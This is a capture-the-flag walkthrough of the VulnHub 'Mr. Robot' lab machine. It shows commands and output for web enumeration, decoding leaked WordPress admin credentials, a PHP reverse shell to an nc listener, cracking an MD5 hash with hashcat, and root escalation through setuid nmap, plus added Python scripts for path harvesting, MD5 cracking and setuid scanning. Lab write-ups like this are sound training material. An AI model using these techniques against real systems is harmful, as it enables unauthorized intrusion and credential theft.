Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.
ENUMERATION
The Mr. Robot VM is running on a host-only adapter/network of 192.168.110.0/24. The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:
nmap -vv 192.168.110.200-254
Results:
Scanning 192.168.110.201 [1000 ports]
Discovered open port 443/tcp on 192.168.110.201
Discovered open port 80/tcp on 192.168.110.201
Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports)
Nmap scan report for 192.168.110.201
Host is up, received arp-response (0.00077s latency).
Scanned at 2016-08-30 02:10:30 CDT for 6s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64
443/tcp open https syn-ack ttl 64
Right away we see that the machine's IP address is 192.168.110.201 and that ports 80 and 443 are open (22 is closed, so there is no SSH to go after for now). Navigating to http://192.168.110.201 in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.
Now we'll run dirb to enumerate the files and folders on the web server:
dirb http://192.168.110.201
And get a big list of results to look through:
---- Scanning URL: http://192.168.110.201/
==> DIRECTORY: http://192.168.110.201/0/
==> DIRECTORY: http://192.168.110.201/admin/
+ http://192.168.110.201/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.110.201/audio/
==> DIRECTORY: http://192.168.110.201/blog/
==> DIRECTORY: http://192.168.110.201/css/
+ http://192.168.110.201/dashboard (CODE:302|SIZE:0)
+ http://192.168.110.201/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/feed/
==> DIRECTORY: http://192.168.110.201/image/
==> DIRECTORY: http://192.168.110.201/Image/
==> DIRECTORY: http://192.168.110.201/images/
+ http://192.168.110.201/index.html (CODE:200|SIZE:1077)
+ http://192.168.110.201/index.php (CODE:301|SIZE:0)
+ http://192.168.110.201/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.110.201/js/
+ http://192.168.110.201/license (CODE:200|SIZE:309)
+ http://192.168.110.201/login (CODE:302|SIZE:0)
+ http://192.168.110.201/page1 (CODE:301|SIZE:0)
+ http://192.168.110.201/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.110.201/rdf (CODE:301|SIZE:0)
+ http://192.168.110.201/readme (CODE:200|SIZE:64)
+ http://192.168.110.201/robots (CODE:200|SIZE:41)
+ http://192.168.110.201/robots.txt (CODE:200|SIZE:41)
+ http://192.168.110.201/rss (CODE:301|SIZE:0)
+ http://192.168.110.201/rss2 (CODE:301|SIZE:0)
+ http://192.168.110.201/sitemap (CODE:200|SIZE:0)
+ http://192.168.110.201/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/video/
==> DIRECTORY: http://192.168.110.201/wp-admin/
+ http://192.168.110.201/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-content/
+ http://192.168.110.201/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-includes/
+ http://192.168.110.201/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.110.201/wp-load (CODE:200|SIZE:0)
+ http://192.168.110.201/wp-login (CODE:200|SIZE:2685)
+ http://192.168.110.201/wp-mail (CODE:500|SIZE:3064)
+ http://192.168.110.201/wp-settings (CODE:500|SIZE:0)
+ http://192.168.110.201/wp-signup (CODE:302|SIZE:0)
+ http://192.168.110.201/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.110.201/xmlrpc.php (CODE:405|SIZE:42)
We see that WordPress is installed (wp-admin, wp-login, xmlrpc.php). But before messing with that, it's crucial that we go through every other file and folder and look for useful information. The first interesting file we find is http://192.168.110.201/license. NOTE: At first glance this page is just one line of text taunting us. Make sure you scroll through the ENTIRE THING!
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
~~snip~~
do you want a password or something?
~~snip~~
ZWxsaW90OkVSMjgtMDY1Mgo=
At the very bottom of the page we find what looks to be a base64-encoded string. Let's decode it in the terminal:
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652
Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.
FIRST FLAG FOUND
After continuing to look through the files and directories found by dirb, we make our way to the robots.txt file. In there we find two very interesting file names (note that they are listed as bare lines, not as Disallow rules):
User-agent: *
fsocity.dic
key-1-of-3.txt
The fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to http://192.168.110.201/key-1-of-3.txt, we find the first of three flags:
073403c8a58a1f80d943455fb30724b9
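The robots.txt above is worth a second look: it contains no Disallow lines at all, so a standards-conforming robots parser would silently discard both file names. The small harvester below is an added example, not part of the original writeup; it treats robots.txt as a hint list rather than a crawl policy, keeping bare lines as well as directive values. The first input is the VM's robots.txt as copied from above; the second is a constructed file in the conventional form, and example.test is a placeholder host.

```python
import re
from urllib.parse import urljoin

# robots.txt exactly as the VM serves it (copied from the writeup above).
MRROBOT_ROBOTS = "User-agent: *\nfsocity.dic\nkey-1-of-3.txt\n"

# A second, constructed file in the conventional Disallow form (not from the VM),
# so the harvester is exercised on both shapes.
CONSTRUCTED_ROBOTS = """# constructed example
User-agent: *
Disallow: /wp-admin/
Disallow: /backup.tar.gz
Disallow:
Allow: /wp-admin/admin-ajax.php
Sitemap: http://example.test/sitemap.xml
"""

DIRECTIVE = re.compile(r"^([A-Za-z-]+)\s*:\s*(.*)$")
KNOWN_DIRECTIVES = {"user-agent", "disallow", "allow", "sitemap",
                    "crawl-delay", "host", "clean-param"}
# Directives whose value is never a path or URL worth fetching.
NO_PATH_DIRECTIVES = {"user-agent", "crawl-delay", "host", "clean-param"}


def harvest_robots_paths(text, base_url):
    """Return a sorted list of URLs worth fetching from a robots.txt body.

    A standards-conforming parser keys on Disallow/Allow lines and drops
    anything else, which would throw away 'fsocity.dic' and 'key-1-of-3.txt'
    here. For enumeration we want the opposite: keep every directive value
    that names a path or URL, and keep bare lines as paths relative to the
    site root.
    """
    urls = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        m = DIRECTIVE.match(line)
        if m and m.group(1).lower() in KNOWN_DIRECTIVES:
            key, value = m.group(1).lower(), m.group(2).strip()
            if key in NO_PATH_DIRECTIVES or not value:
                continue
            target = value                       # Disallow/Allow/Sitemap value
        else:
            target = line                        # bare token, as on this VM
        if target == "/" or "*" in target or "$" in target:
            continue                             # blanket or wildcard rule, names no file
        urls.add(urljoin(base_url, target))
    return sorted(urls)


if __name__ == "__main__":
    for url in harvest_robots_paths(MRROBOT_ROBOTS, "http://192.168.110.201/"):
        print(url)
```

Run against the VM's file this yields the two URLs to fetch next; against the constructed file it keeps the Disallow and Allow paths and the Sitemap URL while skipping the empty Disallow. Feeding the result to curl or a requests loop is the obvious next step, but that part needs the live box and is left out here.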
WORDPRESS & GETTING A SHELL
With the first flag captured and the enumeration and looting of the web server's public files and directories complete, it's time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we're able to log into WordPress at /wp-login. It becomes immediately apparent that elliot is the administrator account.
Now that we have access to the WordPress administrator account, we should be able to set up a reverse-shell back to a listener on our attack machine. I used a php reverse-shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.
Before executing the code on the server, first start a listener on the attack machine. Use whatever port the uploaded shell is configured to connect back to; I used 666 in this example:
nc -lvp 666
With the listener running, we can now use the browser to navigate to the location of our shell (http://192.168.110.201/wp-content/uploads/2016/08/shell.php). When the PHP executes, the connection comes back to the listener and we have a shell on the attack machine.
With a shell established, let's begin looking around. I tend to start in the home directory, and in this instance we find a folder for a user named "robot". Let's cd into that folder and take a look:
$ cd /home/robot/
$ ls -asl
total 16
4 drwxr-xr-x 2 root root 4096 Nov 13 2015 .
4 drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
4 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
We find the second key file, but it is mode 0400 and owned by robot, so our current user can't read it. The file next to it, password.raw-md5, is world-readable:
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
It looks to be the username and password hash for the user "robot"; the file name tells us it is a raw (unsalted) MD5 digest. Let's place that hash in a text file on the attack machine named hashes, then use hashcat in straight dictionary mode (-a 0) with the raw-MD5 hash type (-m 0) and the rockyou.txt wordlist to try and crack it:
hashcat -a 0 -m 0 hashes rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...
Added hashes from file hashes: 1 (1 salts)
Activating quick-digest mode for single-hash
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
All hashes have been recovered
Input.Mode: Dict (rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 2.77M words
Progress..: 1853946/3627099 (51.11%)
Running...: 00:00:00:01
Estimated.: --:--:--:--
So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.
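To make clear what hashcat -a 0 -m 0 is actually doing, here is a stand-alone dictionary attack on raw MD5 in Python. It is an added example, not code from the writeup: the hash line is the one recovered from password.raw-md5 above, but the wordlist is a short constructed list standing in for rockyou.txt (the real file is not embedded here). The digest is also the RFC 1321 test vector for MD5("abcdefghijklmnopqrstuvwxyz"), which is why such a simple wordlist recovers it.

```python
import hashlib

# Constructed stand-ins for the 'hashes' file and rockyou.txt used in the writeup.
# The hash line is the real one from /home/robot/password.raw-md5.
HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
WORDLIST = [
    "123456", "password", "elliot", "mrrobot", "fsociety",
    "abcdefghijklmnopqrstuvwxyz", "letmein",
]

HEX_DIGITS = set("0123456789abcdef")


def parse_hash_file(text):
    """Parse 'user:hexdigest' lines (the password.raw-md5 layout) into
    {digest: user}. Rejects anything that is not a 32-hex-char MD5 so a
    mis-typed or salted hash is caught before a long cracking run."""
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.rsplit(":", 1)
        digest = digest.lower()
        if len(digest) != 32 or not set(digest) <= HEX_DIGITS:
            raise ValueError(f"not a raw MD5 hex digest: {digest!r}")
        targets[digest] = user
    return targets


def crack_raw_md5(targets, wordlist):
    """Dictionary attack on unsalted MD5, the equivalent of hashcat -a 0 -m 0.

    Each candidate word is hashed once and looked up against every loaded
    target, so the cost is O(len(wordlist)) no matter how many hashes were
    loaded. Note that the word is hashed WITHOUT a trailing newline: piping
    a word through 'echo | md5sum' appends one and gives a different digest.
    """
    remaining = dict(targets)
    recovered = {}
    for word in wordlist:
        if not remaining:
            break
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        user = remaining.pop(digest, None)
        if user is not None:
            recovered[user] = word
    return recovered


if __name__ == "__main__":
    found = crack_raw_md5(parse_hash_file(HASH_FILE), WORDLIST)
    for user, password in found.items():
        print(f"{user}:{password}")
```

The newline point in the comment is the one that bites people when they try to reproduce a crack by hand on the command line: use printf or echo -n when computing a reference digest, or the lookup will never match.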
GETTING FLAG #2
When attempting to log in as "robot" with 'su - robot', I kept getting an error saying su must be run from a terminal. A reverse shell like this one has no controlling tty, which is what su is complaining about. I got around it by borrowing the following command from g0tmi1k's Basic Linux Privilege Escalation page, which spawns a proper pseudo-terminal:
python -c 'import pty;pty.spawn("/bin/bash")'
Which then allowed me to login as robot:
daemon@linux:/$ su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robot
Now that we’re logged in as robot, we can finally read the 2nd flag file:
$ cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
GETTING ROOT & FLAG #3
Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db and elsewhere, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM and that I should look into that. After some Google searching, I learned that older nmap releases have an interactive mode (--interactive) in which a line beginning with ! is passed to the shell, and that this can be used to escalate privileges in certain scenarios: if the nmap binary runs with elevated privileges, for example because it carries the setuid bit and is owned by root, the shell it spawns inherits them. Two things decide whether this works on a given box, so check both: the installed nmap version (interactive mode was removed from later releases) and the permission bits on the binary.
From there it was smooth sailing, and I managed to quickly get root privileges and read the third and final flag file.
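The check that would have found this without the hint is a scan for setuid-root binaries, the usual find / -perm -4000 step from any Linux privilege-escalation checklist. The script below is an added example, not part of the original writeup: it walks the filesystem, reports every setuid-root file, and highlights the ones whose names are well known (from GTFOBins) to hand out a shell when run with elevated privileges. The SAMPLE_ENTRIES listing is constructed to illustrate the output shape and assumes an nmap at /usr/local/bin/nmap; it is not a capture from the VM.

```python
import os
import stat

# Binaries that are well known (see GTFOBins) to hand out a shell or arbitrary
# file access when they run with elevated privileges. nmap is the one that
# matters on this VM; the rest are here so the check generalises to other boxes.
KNOWN_ESCALATORS = {
    "nmap", "vim", "vi", "find", "bash", "sh", "python", "python2", "python3",
    "perl", "less", "more", "awk", "nano", "cp", "mv", "env", "tar", "zip",
}

# Pseudo-filesystems that are noisy, slow and never hold real binaries.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setuid_root(mode, uid):
    """True for a regular file owned by root (uid 0) with the setuid bit set.
    A setuid file owned by another user only lets you become that user."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def classify_entries(entries):
    """entries: iterable of (path, st_mode, st_uid), from find_setuid_files()
    or constructed. Returns (all setuid-root paths, the subset whose basename
    is a known escalator), both sorted."""
    setuid_root = sorted(p for p, mode, uid in entries if is_setuid_root(mode, uid))
    interesting = [p for p in setuid_root
                   if os.path.basename(p) in KNOWN_ESCALATORS]
    return setuid_root, interesting


def find_setuid_files(root="/"):
    """Walk the filesystem without following symlinks and yield
    (path, mode, uid) for every regular file. Unreadable directories and
    vanished files are skipped, like 'find / -perm -4000 2>/dev/null'."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed listing (not captured from the VM) showing what the walk returns.
# 0o104755 is the st_mode of a setuid 4755 regular file; 0o100755 is plain 0755.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),       # setuid root, expected on any Linux
    ("/usr/local/bin/nmap", 0o104755, 0),   # setuid root AND on the escalator list
    ("/bin/ls", 0o100755, 0),               # root-owned but not setuid
    ("/home/robot/tool", 0o104755, 1002),   # setuid, but not root: no root escalation
]


if __name__ == "__main__":
    found, hits = classify_entries(find_setuid_files("/"))
    print(f"{len(found)} setuid-root files")
    for path in hits:
        print(f"check GTFOBins for: {path}")
```

Run as the low-privilege user you already have, this is the thing to do before reaching for exploit-db: a setuid-root binary on the escalator list is a two-minute root, while a kernel exploit is a gamble. On this VM the hit is nmap, and the version check from the previous paragraph is what tells you whether its interactive mode is still there.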
CONCLUSION
This was a fun machine overall and taught me a few things:
First: How easily a WordPress administrator account can be leveraged to get a shell on the server, because admin can upload or edit PHP that the web server will execute.
Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.
Enumerate, enumerate, enumerate…And then Google everything you find.